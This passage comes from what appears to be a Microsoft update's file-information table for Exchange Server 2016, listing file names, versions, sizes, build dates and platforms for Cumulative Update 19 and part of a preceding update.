49,048| 04-Apr-2021| 09:11| x86 \nSplit_publicfoldermailbox.ps1| Not applicable| 52,177| 04-Apr-2021| 09:15| Not applicable \nStartdagservermaintenance.ps1| Not applicable| 27,875| 04-Apr-2021| 09:11| Not applicable \nStatisticsutil.dll| 15.1.2242.5| 142,224| 04-Apr-2021| 09:13| x64 \nStopdagservermaintenance.ps1| Not applicable| 21,121| 04-Apr-2021| 09:11| Not applicable \nStoretsconstants.ps1| Not applicable| 15,854| 04-Apr-2021| 09:11| Not applicable \nStoretslibrary.ps1| Not applicable| 28,031| 04-Apr-2021| 09:11| Not applicable \nStore_mapi_net_bin_perf_x64_exrpcperf.dll| 15.1.2242.5| 28,568| 04-Apr-2021| 09:15| x64 \nSync_mailpublicfolders.ps1| Not applicable| 43,915| 04-Apr-2021| 09:15| Not applicable \nSync_modernmailpublicfolders.ps1| Not applicable| 43,957| 04-Apr-2021| 09:15| Not applicable \nTextconversionmodule.dll| 15.1.2242.5| 86,400| 04-Apr-2021| 09:11| x64 \nTroubleshoot_ci.ps1| Not applicable| 22,755| 04-Apr-2021| 09:12| Not applicable \nTroubleshoot_databaselatency.ps1| Not applicable| 33,461| 04-Apr-2021| 09:12| Not applicable \nTroubleshoot_databasespace.ps1| Not applicable| 30,057| 04-Apr-2021| 09:11| Not applicable \nUmservice.exe| 15.1.2242.8| 100,232| 04-Apr-2021| 09:11| x86 \nUmworkerprocess.exe| 15.1.2242.8| 38,272| 04-Apr-2021| 09:13| x86 \nUninstall_antispamagents.ps1| Not applicable| 15,461| 04-Apr-2021| 09:12| Not applicable \nUpdateapppoolmanagedframeworkversion.ps1| Not applicable| 14,018| 04-Apr-2021| 09:16| Not applicable \nUpdatecas.ps1| Not applicable| 32,976| 04-Apr-2021| 09:13| Not applicable \nUpdateconfigfiles.ps1| Not applicable| 19,766| 04-Apr-2021| 09:13| Not applicable \nUpdateserver.exe| 15.1.2242.5| 3,014,536| 04-Apr-2021| 09:11| x64 \nUpdate_malwarefilteringserver.ps1| Not applicable| 18,144| 04-Apr-2021| 09:16| Not applicable \nWeb.config_053c31bdd6824e95b35d61b0a5e7b62d| Not applicable| 31,815| 04-Apr-2021| 09:14| Not applicable \nWsbexchange.exe| 15.1.2242.5| 125,304| 04-Apr-2021| 09:11| x64 \nX400prox.dll| 15.1.2242.5| 103,304| 04-Apr-2021| 09:14| x64 \n_search.lingoperators.a| 15.1.2242.5| 34,688| 04-Apr-2021| 09:12| Not applicable \n_search.lingoperators.b| 15.1.2242.5| 34,688| 04-Apr-2021| 09:12| Not applicable \n_search.mailboxoperators.a| 15.1.2242.8| 289,176| 04-Apr-2021| 09:11| Not applicable \n_search.mailboxoperators.b| 15.1.2242.8| 289,176| 04-Apr-2021| 09:11| Not applicable \n_search.operatorschema.a| 15.1.2242.5| 483,192| 04-Apr-2021| 09:13| Not applicable \n_search.operatorschema.b| 15.1.2242.5| 483,192| 04-Apr-2021| 09:13| Not applicable \n_search.tokenoperators.a| 15.1.2242.5| 106,888| 04-Apr-2021| 09:11| Not applicable \n_search.tokenoperators.b| 15.1.2242.5| 106,888| 04-Apr-2021| 09:11| Not applicable \n_search.transportoperators.a| 15.1.2242.8| 64,920| 04-Apr-2021| 09:11| Not applicable \n_search.transportoperators.b| 15.1.2242.8| 64,920| 04-Apr-2021| 09:11| Not applicable \n \n#### \n\n__\n\nMicrosoft Exchange Server 2016 Cumulative Update 19\n\nFile name| File version| File size| Date| Time| Platform \n---|---|---|---|---|--- \nActivemonitoringeventmsg.dll| 15.1.2176.12| 71,048| 04-Apr-2021| 10:25| x64 \nActivemonitoringexecutionlibrary.ps1| Not applicable| 29,522| 04-Apr-2021| 10:23| Not applicable \nAdduserstopfrecursive.ps1| Not applicable| 14,945| 04-Apr-2021| 10:23| Not applicable \nAdemodule.dll| 15.1.2176.12| 106,368| 04-Apr-2021| 10:22| x64 \nAirfilter.dll| 15.1.2176.12| 42,888| 04-Apr-2021| 10:22| x64 \nAjaxcontroltoolkit.dll| 15.1.2176.12| 92,560| 04-Apr-2021| 10:23| x86 \nAntispamcommon.ps1| Not applicable| 13,489| 04-Apr-2021| 10:23| Not applicable \nAsdat.msi| Not applicable| 5,087,232| 04-Apr-2021| 10:24| Not applicable \nAsentirs.msi| Not applicable| 77,824| 04-Apr-2021| 10:24| Not applicable \nAsentsig.msi| Not applicable| 73,728| 04-Apr-2021| 10:24| Not applicable \nBigfunnel.bondtypes.dll| 15.1.2176.12| 43,904| 04-Apr-2021| 10:23| x86 \nBigfunnel.common.dll| 15.1.2176.12| 63,896| 04-Apr-2021| 10:23| x86 \nBigfunnel.configuration.dll| 15.1.2176.12| 99,208| 04-Apr-2021| 10:23| x86 \nBigfunnel.entropy.dll| 15.1.2176.12| 44,424| 04-Apr-2021| 10:23| x86 \nBigfunnel.filter.dll| 15.1.2176.12| 54,144| 04-Apr-2021| 10:23| x86 \nBigfunnel.indexstream.dll| 15.1.2176.12| 54,152| 04-Apr-2021| 10:23| x86 \nBigfunnel.poi.dll| 15.1.2176.12| 203,648| 04-Apr-2021| 10:23| x86 \nBigfunnel.postinglist.dll| 15.1.2176.12| 122,232| 04-Apr-2021| 10:23| x86 \nBigfunnel.query.dll| 15.1.2176.12| 99,712| 04-Apr-2021| 10:23| x86 \nBigfunnel.ranking.dll| 15.1.2176.12| 79,232| 04-Apr-2021| 10:22| x86 \nBigfunnel.syntheticdatalib.dll| 15.1.2176.12| 3,634,560| 04-Apr-2021| 10:22| x86 \nBigfunnel.wordbreakers.dll| 15.1.2176.12| 46,488| 04-Apr-2021| 10:22| x86 \nCafe_airfilter_dll| 15.1.2176.12| 42,888| 04-Apr-2021| 10:22| x64 \nCafe_exppw_dll| 15.1.2176.12| 83,336| 04-Apr-2021| 10:26| x64 \nCafe_owaauth_dll| 15.1.2176.12| 92,040| 04-Apr-2021| 10:26| x64 \nCalcalculation.ps1| Not applicable| 42,113| 04-Apr-2021| 10:26| Not applicable \nCheckdatabaseredundancy.ps1| Not applicable| 94,606| 04-Apr-2021| 10:24| Not applicable \nChksgfiles.dll| 15.1.2176.12| 57,232| 04-Apr-2021| 10:27| x64 \nCitsconstants.ps1| Not applicable| 15,821| 04-Apr-2021| 10:22| Not applicable \nCitslibrary.ps1| Not applicable| 82,680| 04-Apr-2021| 10:22| Not applicable \nCitstypes.ps1| Not applicable| 14,464| 04-Apr-2021| 10:22| Not applicable \nClassificationengine_mce| 15.1.2176.12| 1,693,576| 04-Apr-2021| 10:22| Not applicable \nClusmsg.dll| 15.1.2176.12| 134,024| 04-Apr-2021| 10:26| x64 \nCoconet.dll| 15.1.2176.12| 48,024| 04-Apr-2021| 10:23| x64 \nCollectovermetrics.ps1| Not applicable| 81,684| 04-Apr-2021| 10:23| Not applicable \nCollectreplicationmetrics.ps1| Not applicable| 41,886| 04-Apr-2021| 10:24| Not applicable \nCommonconnectfunctions.ps1| Not applicable| 29,967| 04-Apr-2021| 10:22| Not applicable \nComplianceauditservice.exe| 15.1.2176.12| 39,816| 04-Apr-2021| 10:26| x86 \nConfigureadam.ps1| Not applicable| 22,780| 04-Apr-2021| 10:23| Not applicable \nConfigurecaferesponseheaders.ps1| Not applicable| 20,324| 04-Apr-2021| 10:23| Not applicable \nConfigurenetworkprotocolparameters.ps1| Not applicable| 19,786| 04-Apr-2021| 10:23| Not applicable \nConfiguresmbipsec.ps1| Not applicable| 39,844| 04-Apr-2021| 10:23| Not applicable \nConfigure_enterprisepartnerapplication.ps1| Not applicable| 22,299| 04-Apr-2021| 10:23| Not applicable \nConnectfunctions.ps1| Not applicable| 37,165| 04-Apr-2021| 10:26| Not applicable \nConnect_exchangeserver_help.xml| Not applicable| 30,436| 04-Apr-2021| 10:26| Not applicable \nConsoleinitialize.ps1| Not applicable| 24,248| 04-Apr-2021| 10:22| Not applicable \nConvertoabvdir.ps1| Not applicable| 20,069| 04-Apr-2021| 10:23| Not applicable \nConverttomessagelatency.ps1| Not applicable| 14,548| 04-Apr-2021| 10:23| Not applicable \nConvert_distributiongrouptounifiedgroup.ps1| Not applicable| 34,781| 04-Apr-2021| 10:23| Not applicable \nCreate_publicfoldermailboxesformigration.ps1| Not applicable| 27,928| 04-Apr-2021| 10:23| Not applicable \nCts.14.0.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 509| 04-Apr-2021| 07:22| Not applicable \nCts.14.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 509| 04-Apr-2021| 07:22| Not applicable \nCts.14.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 509| 04-Apr-2021| 07:22| Not applicable \nCts.14.3.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 509| 04-Apr-2021| 07:22| Not applicable \nCts.14.4.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 509| 04-Apr-2021| 07:22| Not applicable \nCts.15.0.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 509| 04-Apr-2021| 07:22| Not applicable \nCts.15.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 509| 04-Apr-2021| 07:22| Not applicable \nCts.15.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 509| 04-Apr-2021| 07:22| Not applicable \nCts.15.20.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 509| 04-Apr-2021| 07:22| Not applicable \nCts.8.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 509| 04-Apr-2021| 07:22| Not applicable \nCts.8.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 509| 04-Apr-2021| 07:22| Not applicable \nCts.8.3.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 509| 04-Apr-2021| 07:22| Not applicable \nCts_exsmime.dll| 15.1.2176.12| 380,808| 04-Apr-2021| 10:26| x64 \nCts_microsoft.exchange.data.common.dll| 15.1.2176.12| 1,686,912| 04-Apr-2021| 10:23| x86 \nCts_microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 509| 04-Apr-2021| 07:22| Not applicable \nCts_policy.14.0.microsoft.exchange.data.common.dll| 15.1.2176.12| 13,192| 04-Apr-2021| 10:24| x86 \nCts_policy.14.1.microsoft.exchange.data.common.dll| 15.1.2176.12| 13,184| 04-Apr-2021| 10:24| x86 \nCts_policy.14.2.microsoft.exchange.data.common.dll| 15.1.2176.12| 13,192| 04-Apr-2021| 10:22| x86 \nCts_policy.14.3.microsoft.exchange.data.common.dll| 15.1.2176.12| 13,184| 04-Apr-2021| 10:24| x86 \nCts_policy.14.4.microsoft.exchange.data.common.dll| 15.1.2176.12| 13,184| 04-Apr-2021| 10:23| x86 \nCts_policy.15.0.microsoft.exchange.data.common.dll| 15.1.2176.12| 13,184| 04-Apr-2021| 10:24| x86 \nCts_policy.15.1.microsoft.exchange.data.common.dll| 15.1.2176.12| 13,192| 04-Apr-2021| 10:23| x86 \nCts_policy.15.2.microsoft.exchange.data.common.dll| 15.1.2176.12| 13,184| 04-Apr-2021| 10:23| x86 \nCts_policy.15.20.microsoft.exchange.data.common.dll| 15.1.2176.12| 13,192| 04-Apr-2021| 10:25| x86 \nCts_policy.8.0.microsoft.exchange.data.common.dll| 15.1.2176.12| 12,672| 04-Apr-2021| 10:23| x86 \nCts_policy.8.1.microsoft.exchange.data.common.dll| 15.1.2176.12| 12,680| 04-Apr-2021| 10:22| x86 \nCts_policy.8.2.microsoft.exchange.data.common.dll| 15.1.2176.12| 12,672| 04-Apr-2021| 10:23| x86 \nCts_policy.8.3.microsoft.exchange.data.common.dll| 15.1.2176.12| 12,672| 04-Apr-2021| 10:23| x86 \nDagcommonlibrary.ps1| Not applicable| 60,262| 04-Apr-2021| 10:22| Not applicable \nDependentassemblygenerator.exe| 15.1.2176.12| 22,408| 04-Apr-2021| 10:26| x86 \nDiaghelper.dll| 15.1.2176.12| 66,968| 04-Apr-2021| 10:22| x86 \nDiagnosticscriptcommonlibrary.ps1| Not applicable| 16,350| 04-Apr-2021| 10:21| Not applicable \nDisableinmemorytracing.ps1| Not applicable| 13,378| 04-Apr-2021| 10:23| Not applicable \nDisable_antimalwarescanning.ps1| Not applicable| 15,205| 04-Apr-2021| 10:23| Not applicable \nDisable_outsidein.ps1| Not applicable| 13,670| 04-Apr-2021| 10:23| Not applicable \nDisklockerapi.dll| Not applicable| 22,408| 04-Apr-2021| 10:24| x64 \nDlmigrationmodule.psm1| Not applicable| 39,596| 04-Apr-2021| 10:23| Not applicable \nDsaccessperf.dll| 15.1.2176.12| 45,976| 04-Apr-2021| 10:23| x64 \nDscperf.dll| 15.1.2176.12| 32,648| 04-Apr-2021| 10:24| x64 \nDup_cts_microsoft.exchange.data.common.dll| 15.1.2176.12| 1,686,912| 04-Apr-2021| 10:23| x86 \nDup_ext_microsoft.exchange.data.transport.dll| 15.1.2176.12| 601,488| 04-Apr-2021| 10:22| x86 \nEcpperfcounters.xml| Not applicable| 31,144| 04-Apr-2021| 10:21| Not applicable \nEdgeextensibility_microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 512| 04-Apr-2021| 07:22| Not applicable \nEdgeextensibility_policy.8.0.microsoft.exchange.data.transport.dll| 15.1.2176.12| 13,192| 04-Apr-2021| 10:26| x86 \nEdgetransport.exe| 15.1.2176.12| 49,552| 04-Apr-2021| 10:26| x86 \nEext.14.0.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 512| 04-Apr-2021| 07:22| Not applicable \nEext.14.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 512| 04-Apr-2021| 07:22| Not applicable \nEext.14.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 512| 04-Apr-2021| 07:22| Not applicable \nEext.14.3.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 512| 04-Apr-2021| 07:22| Not applicable \nEext.14.4.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 512| 04-Apr-2021| 07:22| Not applicable \nEext.15.0.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 512| 04-Apr-2021| 07:22| Not applicable \nEext.15.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 512| 04-Apr-2021| 07:22| Not applicable \nEext.15.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 512| 04-Apr-2021| 07:22| Not applicable \nEext.15.20.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 512| 04-Apr-2021| 07:22| Not applicable \nEext.8.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 512| 04-Apr-2021| 07:22| Not applicable \nEext.8.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 512| 04-Apr-2021| 07:22| Not applicable \nEext.8.3.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 512| 04-Apr-2021| 07:22| Not applicable \nEext_policy.14.0.microsoft.exchange.data.transport.dll| 15.1.2176.12| 13,176| 04-Apr-2021| 10:26| x86 \nEext_policy.14.1.microsoft.exchange.data.transport.dll| 15.1.2176.12| 13,208| 04-Apr-2021| 10:26| x86 \nEext_policy.14.2.microsoft.exchange.data.transport.dll| 15.1.2176.12| 13,192| 04-Apr-2021| 10:26| x86 \nEext_policy.14.3.microsoft.exchange.data.transport.dll| 15.1.2176.12| 13,192| 04-Apr-2021| 10:26| x86 \nEext_policy.14.4.microsoft.exchange.data.transport.dll| 15.1.2176.12| 13,184| 04-Apr-2021| 10:26| x86 \nEext_policy.15.0.microsoft.exchange.data.transport.dll| 15.1.2176.12| 13,184| 04-Apr-2021| 10:26| x86 \nEext_policy.15.1.microsoft.exchange.data.transport.dll| 15.1.2176.12| 13,184| 04-Apr-2021| 10:26| x86 \nEext_policy.15.2.microsoft.exchange.data.transport.dll| 15.1.2176.12| 13,192| 04-Apr-2021| 10:26| x86 \nEext_policy.15.20.microsoft.exchange.data.transport.dll| 15.1.2176.12| 13,192| 04-Apr-2021| 10:26| x86 \nEext_policy.8.1.microsoft.exchange.data.transport.dll| 15.1.2176.12| 13,184| 04-Apr-2021| 10:26| x86 \nEext_policy.8.2.microsoft.exchange.data.transport.dll| 15.1.2176.12| 13,184| 04-Apr-2021| 10:26| x86 \nEext_policy.8.3.microsoft.exchange.data.transport.dll| 15.1.2176.12| 13,184| 04-Apr-2021| 10:26| x86 \nEnableinmemorytracing.ps1| Not applicable| 13,380| 04-Apr-2021| 10:23| Not applicable \nEnable_antimalwarescanning.ps1| Not applicable| 17,579| 04-Apr-2021| 10:24| Not applicable \nEnable_basicauthtooauthconverterhttpmodule.ps1| Not applicable| 18,604| 04-Apr-2021| 10:23| Not applicable \nEnable_crossforestconnector.ps1| Not applicable| 18,614| 04-Apr-2021| 10:23| Not applicable \nEnable_outlookcertificateauthentication.ps1| Not applicable| 22,932| 04-Apr-2021| 10:23| Not applicable \nEnable_outsidein.ps1| Not applicable| 13,663| 04-Apr-2021| 10:23| Not applicable \nEngineupdateserviceinterfaces.dll| 15.1.2176.12| 17,792| 04-Apr-2021| 10:24| x86 \nEscprint.dll| 15.1.2176.12| 20,360| 04-Apr-2021| 10:22| x64 \nEse.dll| 15.1.2176.12| 3,695,504| 04-Apr-2021| 10:22| x64 \nEseback2.dll| 15.1.2176.12| 325,008| 04-Apr-2021| 10:22| x64 \nEsebcli2.dll| 15.1.2176.12| 292,744| 04-Apr-2021| 10:22| x64 \nEseperf.dll| 15.1.2176.12| 116,120| 04-Apr-2021| 10:24| x64 \nEseutil.exe| 15.1.2176.12| 398,744| 04-Apr-2021| 10:26| x64 \nEsevss.dll| 15.1.2176.12| 44,440| 04-Apr-2021| 10:22| x64 \nEtweseproviderresources.dll| 15.1.2176.12| 82,320| 04-Apr-2021| 10:22| x64 \nEventperf.dll| 15.1.2176.12| 59,784| 04-Apr-2021| 10:22| x64 \nExchange.depthtwo.types.ps1xml| Not applicable| 40,136| 04-Apr-2021| 10:26| Not applicable \nExchange.format.ps1xml| Not applicable| 648,639| 04-Apr-2021| 10:26| Not applicable \nExchange.partial.types.ps1xml| Not applicable| 43,353| 04-Apr-2021| 10:26| Not applicable \nExchange.ps1| Not applicable| 20,831| 04-Apr-2021| 10:26| Not applicable \nExchange.support.format.ps1xml| Not applicable| 26,582| 04-Apr-2021| 10:26| Not applicable \nExchange.types.ps1xml| Not applicable| 365,180| 04-Apr-2021| 10:26| Not applicable \nExchangeudfcommon.dll| 15.1.2176.12| 121,728| 04-Apr-2021| 10:26| x86 \nExchangeudfs.dll| 15.1.2176.12| 269,696| 04-Apr-2021| 10:26| x86 \nExchmem.dll| 15.1.2176.12| 85,912| 04-Apr-2021| 10:21| x64 \nExchsetupmsg.dll| 15.1.2176.12| 19,328| 04-Apr-2021| 10:27| x64 \nExchucutil.ps1| Not applicable| 23,936| 04-Apr-2021| 10:23| Not applicable \nExdbfailureitemapi.dll| Not applicable| 27,016| 04-Apr-2021| 10:24| x64 \nExdbmsg.dll| 15.1.2176.12| 229,768| 04-Apr-2021| 10:26| x64 \nExeventperfplugin.dll| 15.1.2176.12| 25,464| 04-Apr-2021| 10:22| x64 \nExmime.dll| 15.1.2176.12| 364,928| 04-Apr-2021| 10:26| x64 \nExportedgeconfig.ps1| Not applicable| 27,407| 04-Apr-2021| 10:24| Not applicable \nExport_mailpublicfoldersformigration.ps1| Not applicable| 18,574| 04-Apr-2021| 10:23| Not applicable \nExport_modernpublicfolderstatistics.ps1| Not applicable| 28,870| 04-Apr-2021| 10:23| Not applicable \nExport_outlookclassification.ps1| Not applicable| 14,378| 04-Apr-2021| 10:23| Not applicable \nExport_publicfolderstatistics.ps1| Not applicable| 23,141| 04-Apr-2021| 10:23| Not applicable \nExport_retentiontags.ps1| Not applicable| 17,060| 04-Apr-2021| 10:23| Not applicable \nExppw.dll| 15.1.2176.12| 83,336| 04-Apr-2021| 10:26| x64 \nExprfdll.dll| 15.1.2176.12| 26,504| 04-Apr-2021| 10:24| x64 \nExrpc32.dll| 15.1.2176.12| 1,922,968| 04-Apr-2021| 10:23| x64 \nExrw.dll| 15.1.2176.12| 28,056| 04-Apr-2021| 10:22| x64 \nExsetdata.dll| 15.1.2176.12| 2,779,544| 04-Apr-2021| 10:27| x64 \nExsetup.exe| 15.1.2176.12| 35,192| 04-Apr-2021| 10:26| x86 \nExsetupui.exe| 15.1.2176.12| 193,408| 04-Apr-2021| 10:26| x86 \nExtrace.dll| 15.1.2176.12| 245,128| 04-Apr-2021| 10:22| x64 \nExt_microsoft.exchange.data.transport.dll| 15.1.2176.12| 601,488| 04-Apr-2021| 10:22| x86 \nExwatson.dll| 15.1.2176.12| 44,936| 04-Apr-2021| 10:22| x64 \nFastioext.dll| 15.1.2176.12| 60,304| 04-Apr-2021| 10:26| x64 \nFil06f84122c94c91a0458cad45c22cce20| Not applicable| 784,715| 04-Apr-2021| 10:26| Not applicable \nFil143a7a5d4894478a85eefc89a6539fc8| Not applicable| 1,909,229| 04-Apr-2021| 10:26| Not applicable \nFil19f527f284a0bb584915f9994f4885c3| Not applicable| 648,761| 04-Apr-2021| 10:25| Not applicable \nFil1a9540363a531e7fb18ffe600cffc3ce| Not applicable| 358,406| 04-Apr-2021| 10:24| Not applicable \nFil220d95210c8697448312eee6628c815c| Not applicable| 303,658| 04-Apr-2021| 10:25| Not applicable \nFil2cf5a31e239a45fabea48687373b547c| Not applicable| 652,727| 04-Apr-2021| 10:25| Not applicable \nFil397f0b1f1d7bd44d6e57e496decea2ec| Not applicable| 784,712| 04-Apr-2021| 10:26| Not applicable \nFil3ab126057b34eee68c4fd4b127ff7aee| Not applicable| 784,688| 04-Apr-2021| 10:25| Not applicable \nFil41bb2e5743e3bde4ecb1e07a76c5a7a8| Not applicable| 149,154| 04-Apr-2021| 10:22| Not applicable \nFil51669bfbda26e56e3a43791df94c1e9c| Not applicable| 9,346| 04-Apr-2021| 10:26| Not applicable \nFil558cb84302edfc96e553bcfce2b85286| Not applicable| 85,260| 04-Apr-2021| 10:26| Not applicable \nFil55ce217251b77b97a46e914579fc4c64| Not applicable| 648,755| 04-Apr-2021| 10:25| Not applicable \nFil5a9e78a51a18d05bc36b5e8b822d43a8| Not applicable| 1,597,359| 04-Apr-2021| 10:23| Not applicable \nFil5c7d10e5f1f9ada1e877c9aa087182a9| Not applicable| 1,597,359| 04-Apr-2021| 10:23| Not applicable \nFil6569a92c80a1e14949e4282ae2cc699c| Not applicable| 1,597,359| 04-Apr-2021| 10:23| Not applicable \nFil6a01daba551306a1e55f0bf6894f4d9f| Not applicable| 648,731| 04-Apr-2021| 10:26| Not applicable \nFil8863143ea7cd93a5f197c9fff13686bf| Not applicable| 648,761| 04-Apr-2021| 10:26| Not applicable \nFil8a8c76f225c7205db1000e8864c10038| Not applicable| 1,597,359| 04-Apr-2021| 10:23| Not applicable \nFil8cd999415d36ba78a3ac16a080c47458| Not applicable| 784,718| 04-Apr-2021| 10:26| Not applicable \nFil97913e630ff02079ce9889505a517ec0| Not applicable| 1,597,359| 04-Apr-2021| 10:23| Not applicable \nFilaa49badb2892075a28d58d06560f8da2| Not applicable| 785,742| 04-Apr-2021| 10:26| Not applicable \nFilae28aeed23ccb4b9b80accc2d43175b5| Not applicable| 648,758| 04-Apr-2021| 10:25| Not applicable \nFilb17f496f9d880a684b5c13f6b02d7203| Not applicable| 784,718| 04-Apr-2021| 10:26| Not applicable \nFilb94ca32f2654692263a5be009c0fe4ca| Not applicable| 2,564,949| 04-Apr-2021| 10:23| Not applicable \nFilbabdc4808eba0c4f18103f12ae955e5c| Not applicable| 342,878,821| 04-Apr-2021| 10:23| Not applicable \nFilc92cf2bf29bed21bd5555163330a3d07| Not applicable| 652,745| 04-Apr-2021| 10:25| Not applicable \nFilcc478d2a8346db20c4e2dc36f3400628| Not applicable| 784,718| 04-Apr-2021| 10:25| Not applicable \nFild26cd6b13cfe2ec2a16703819da6d043| Not applicable| 1,597,359| 04-Apr-2021| 10:23| Not applicable \nFilf2719f9dc8f7b74df78ad558ad3ee8a6| Not applicable| 785,724| 04-Apr-2021| 10:26| Not applicable \nFilfa5378dc76359a55ef20cc34f8a23fee| Not applicable| 1,427,187| 04-Apr-2021| 10:23| Not applicable \nFilteringconfigurationcommands.ps1| Not applicable| 18,247| 04-Apr-2021| 10:23| Not applicable \nFilteringpowershell.dll| 15.1.2176.12| 223,112| 04-Apr-2021| 10:22| x86 \nFilteringpowershell.format.ps1xml| Not applicable| 29,668| 04-Apr-2021| 10:21| Not applicable \nFiltermodule.dll| 15.1.2176.12| 180,096| 04-Apr-2021| 10:22| x64 \nFipexeuperfctrresource.dll| 15.1.2176.12| 15,240| 04-Apr-2021| 10:24| x64 \nFipexeventsresource.dll| 15.1.2176.12| 44,952| 04-Apr-2021| 10:25| x64 \nFipexperfctrresource.dll| 15.1.2176.12| 32,640| 04-Apr-2021| 10:22| x64 \nFirewallres.dll| 15.1.2176.12| 72,600| 04-Apr-2021| 10:24| x64 \nFms.exe| 15.1.2176.12| 1,350,040| 04-Apr-2021| 10:21| x64 \nForefrontactivedirectoryconnector.exe| 15.1.2176.12| 111,000| 04-Apr-2021| 10:26| x64 \nFpsdiag.exe| 15.1.2176.12| 18,816| 04-Apr-2021| 10:22| x86 \nFsccachedfilemanagedlocal.dll| 15.1.2176.12| 822,152| 04-Apr-2021| 10:25| x64 \nFscconfigsupport.dll| 15.1.2176.12| 56,704| 04-Apr-2021| 10:22| x86 \nFscconfigurationserver.exe| 15.1.2176.12| 430,992| 04-Apr-2021| 10:22| x64 \nFscconfigurationserverinterfaces.dll| 15.1.2176.12| 15,752| 04-Apr-2021| 10:22| x86 \nFsccrypto.dll| 15.1.2176.12| 208,792| 04-Apr-2021| 10:21| x64 \nFscipcinterfaceslocal.dll| 15.1.2176.12| 28,544| 04-Apr-2021| 10:22| x86 \nFscipclocal.dll| 15.1.2176.12| 38,272| 04-Apr-2021| 10:21| x86 \nFscsqmuploader.exe| 15.1.2176.12| 453,528| 04-Apr-2021| 10:24| x64 \nGetucpool.ps1| Not applicable| 19,791| 04-Apr-2021| 10:23| Not applicable \nGetvalidengines.ps1| Not applicable| 13,310| 04-Apr-2021| 10:22| Not applicable \nGet_antispamfilteringreport.ps1| Not applicable| 15,793| 04-Apr-2021| 10:24| Not applicable \nGet_antispamsclhistogram.ps1| Not applicable| 14,655| 04-Apr-2021| 10:24| Not applicable \nGet_antispamtopblockedsenderdomains.ps1| Not applicable| 15,727| 04-Apr-2021| 10:23| Not applicable \nGet_antispamtopblockedsenderips.ps1| Not applicable| 14,775| 04-Apr-2021| 10:23| Not applicable \nGet_antispamtopblockedsenders.ps1| Not applicable| 15,498| 04-Apr-2021| 10:24| Not applicable \nGet_antispamtoprblproviders.ps1| Not applicable| 14,705| 04-Apr-2021| 10:23| Not applicable \nGet_antispamtoprecipients.ps1| Not applicable| 14,810| 04-Apr-2021| 10:23| Not applicable \nGet_dleligibilitylist.ps1| Not applicable| 42,352| 04-Apr-2021| 10:23| Not applicable \nGet_exchangeetwtrace.ps1| Not applicable| 28,963| 04-Apr-2021| 10:23| Not applicable \nGet_publicfoldermailboxsize.ps1| Not applicable| 15,042| 04-Apr-2021| 10:24| Not applicable \nGet_storetrace.ps1| Not applicable| 50,651| 04-Apr-2021| 10:23| Not applicable \nHuffman_xpress.dll| 15.1.2176.12| 32,648| 04-Apr-2021| 10:23| x64 \nImportedgeconfig.ps1| Not applicable| 77,264| 04-Apr-2021| 10:23| Not applicable \nImport_mailpublicfoldersformigration.ps1| Not applicable| 29,496| 04-Apr-2021| 10:23| Not applicable \nImport_retentiontags.ps1| Not applicable| 28,834| 04-Apr-2021| 10:24| Not applicable \nInproxy.dll| 15.1.2176.12| 85,888| 04-Apr-2021| 10:23| x64 \nInstallwindowscomponent.ps1| Not applicable| 34,539| 04-Apr-2021| 10:26| Not applicable \nInstall_antispamagents.ps1| Not applicable| 17,929| 04-Apr-2021| 10:23| Not applicable \nInstall_odatavirtualdirectory.ps1| Not applicable| 17,983| 04-Apr-2021| 10:23| Not applicable \nInterop.activeds.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 15.1.2176.12| 107,416| 04-Apr-2021| 10:23| Not applicable \nInterop.adsiis.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 15.1.2176.12| 20,376| 04-Apr-2021| 10:25| Not applicable \nInterop.certenroll.dll| 15.1.2176.12| 142,744| 04-Apr-2021| 10:22| x86 \nInterop.licenseinfointerface.dll| 15.1.2176.12| 14,208| 04-Apr-2021| 10:25| x86 \nInterop.netfw.dll| 15.1.2176.12| 34,200| 04-Apr-2021| 10:24| x86 \nInterop.plalibrary.dll| 15.1.2176.12| 72,576| 04-Apr-2021| 10:23| x86 \nInterop.stdole2.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 15.1.2176.12| 27,032| 04-Apr-2021| 10:26| Not applicable \nInterop.taskscheduler.dll| 15.1.2176.12| 46,464| 04-Apr-2021| 10:22| x86 \nInterop.wuapilib.dll| 15.1.2176.12| 60,808| 04-Apr-2021| 10:26| x86 \nInterop.xenroll.dll| 15.1.2176.12| 39,808| 04-Apr-2021| 10:22| x86 \nKerbauth.dll| 15.1.2176.12| 62,856| 04-Apr-2021| 10:26| x64 \nLicenseinfointerface.dll| 15.1.2176.12| 643,480| 04-Apr-2021| 10:22| x64 \nLpversioning.xml| Not applicable| 20,426| 04-Apr-2021| 10:26| Not applicable \nMailboxdatabasereseedusingspares.ps1| Not applicable| 31,944| 04-Apr-2021| 10:24| Not applicable \nManagedavailabilitycrimsonmsg.dll| 15.1.2176.12| 138,624| 04-Apr-2021| 10:24| x64 \nManagedstorediagnosticfunctions.ps1| Not applicable| 125,877| 04-Apr-2021| 10:23| Not applicable \nManagescheduledtask.ps1| Not applicable| 36,380| 04-Apr-2021| 10:23| Not 